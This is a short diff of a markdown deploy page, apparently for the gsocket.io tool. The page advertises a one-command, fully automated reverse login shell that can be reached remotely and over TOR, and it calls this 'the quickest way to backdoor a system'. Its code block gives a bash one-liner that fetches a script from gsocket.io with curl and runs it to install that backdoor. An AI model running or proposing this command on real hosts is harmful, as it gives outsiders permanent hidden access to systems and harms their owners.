hackerschoice/gsocket.io/deploy/index.md

 layout: default
 ---

-Rapid deployment to quickly secure permanent access to a host.
+Deploy a reverse login shell with a single command line (fully automated) - and access the shell remotely - and via TOR if you like.
+Encrypted.

-> _This must be the shortest single-line command to backdoor a system_
+> _This must be the quickest way to backdoor a system_
 >                                                 -- anonymous

-Use either of these two commands to _deploy_:
+Use either one of these two commands to _deploy_:
 ```shell
 bash -c "$(curl -fsSL gsocket.io/x)"
 ```